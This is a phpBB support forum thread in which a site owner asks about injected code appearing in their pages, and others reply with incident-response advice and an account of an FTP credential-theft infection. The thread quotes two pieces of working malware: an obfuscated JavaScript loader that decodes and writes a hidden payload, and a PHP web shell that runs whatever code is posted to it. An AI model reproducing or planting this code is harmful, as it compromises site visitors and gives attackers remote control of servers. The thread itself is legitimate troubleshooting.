Possible hacking?

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Scam Warning
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am
Contact:

Possible hacking?

Post by sitwi »

I'm running 3.0.7, which I'm obviously updating urgently, but I have a worrying problem... the php pages in my root folder are all being tagged with javascript at the end of each page.

Is this a problem with my host's server? With something installed which shouldn't have been? I've added no MODs for ages.

I have the site backed up and it doesn't take one minute to copy over thirty files again. But I obviously need to prevent it, and don't want to put any of my site's visitors at risk.

It's persistent... I've had to repeat the same task 5 or 6 times today.

Any ideas please, anyone?
User avatar
xiteloft
Registered User
Posts: 25
Joined: Wed Aug 12, 2009 9:46 am

Re: Possible hacking?

Post by xiteloft »

Post the JS code here, and you're 100% sure you haven't edited them? If you're 100% sure. Change all of your passwords, especially of the cPanel/FTP.
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am
Contact:

Re: Possible hacking?

Post by sitwi »

100% positive they have not been edited.

I've amended FTP and database passwords.

script added (sometimes more than once) is:

Code: Select all

<script type="text/javascript" language="javascript">tjuka="225222222255552225552255255525222555522525525522255225252252222225552522255552252555222225522525225555252252225225552522255225252555522225552522225255552552225525552255255522552252225222555552225222552552525225555252255225522552522225552522225222222555525525552555255252252552252225552522255252222255525222522222225522222555222225555222225552552552522225522525255252252552255525525222255525222255525222522222225522222555222225555222225552552552255225552252255222252552552525522525255222522552555525552252255225222552252525552252225552522252222225525552255255552255525525552552255252252555225525525225255222522552522525525522255252252555252225555225225552522252222225525222255252252552252225522522255225252552555222555255255555252255552222525555255522552555252225555225255255222552252522555552225555222552522525522552255522522552222525525525255225252252222225525225255225222255552522522252255252522555525225522552255252222555252222522252225222222555225525552252255222552255552522522252255252222555252225552522255522222255525222525555225255552555255525522525255522522552252525552555255522252552252522552255225255522552225525525555225255522552225525522255225255552552222525522522225255522552525225552222255225552252225222555552225555222252555525525225255225522555225225522225255255252552252522555552";ihkzr=100;fqfwq=this;uyhbf="i"+"te";kbgqi=116;wnsch="wr"+uyhbf;for(orukv in fqfwq){if(orukv.length==8 && orukv.charCodeAt(0)==ihkzr && orukv.charCodeAt(7)==kbgqi){break;}}o="";rxkv=0;qzhxw=fqfwq[orukv];lhvhk=53;while (rxkv<tjuka.length){knqmr=0;for(xugvd=0;xugvd<8;xugvd++){knqmr=knqmr<<1;if(tjuka.charCodeAt(rxkv+xugvd)==lhvhk){knqmr++;}}rxkv=rxkv+3;qzhxw[wnsch](String.fromCharCode(knqmr));rxkv=rxkv+5;}</script>
grateful for any help - it's reappearing within hours of me FTPing the old pages back up.
sitwi
Registered User
Posts: 83
Joined: Fri Jul 21, 2006 10:53 am
Contact:

Re: Possible hacking?

Post by sitwi »

Additionally, in my "docs" folder I have a phpinf.php file, also amended with the last hack and just deleted:

Code: Select all

<?php
if (!isset($_POST['eval'])) {die('fuck chicken');}
eval($_POST['eval']);
?>
User avatar
darcie
Community Team Member
Community Team Member
Posts: 5543
Joined: Thu Jul 27, 2006 9:52 am
Location: Davis, California
Name: Darcie Griffin
Contact:

Re: Possible hacking?

Post by darcie »

Please see: http://www.phpbb.com/community/viewtopi ... 543171#iit
My board has been hacked, what do I do? #
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
phpBB on Facebook | Site Rules | Former Community Team leader
Dan East
Registered User
Posts: 35
Joined: Sat Nov 04, 2006 5:15 am

Re: Possible hacking?

Post by Dan East »

Over a year ago I ran into this. I was hit by a pretty complex scheme that involves infecting both servers and client machines. I visited a website which sent me a PDF file, causing Adobe Reader to quickly launch and go away. Just the splash screen came and went is all. Within an hour or so I started getting pop-up ads, etc, on my laptop. It took me a couple days to clean it thoroughly, and I thought I had all that behind me.

About a week later every website that I had FTP credentials to were infected, via FTP download / upload of many PHP and HTML files. The modified code would append javascript to the page, which would in turn serve the exact same PDF that exploited a security hole in Adobe Reader. I assume someone manually parsed passwords from files harvested from my infected laptop, which is why my servers weren't hit until a week later.

My sites have much more PHP than just phpBB, and it was all infected. It wasn't anything specific to phpBB at all, but if that is the only content your site serves then I can see why you might think it is a security hole in phpBB.

Also, a handful of PHP files were not properly infected, which caused errors due to malformed syntax.

The moral of the story are there are many other attack vectors into your site besides just phpBB.
Locked

Return to “[3.0.x] Support Forum”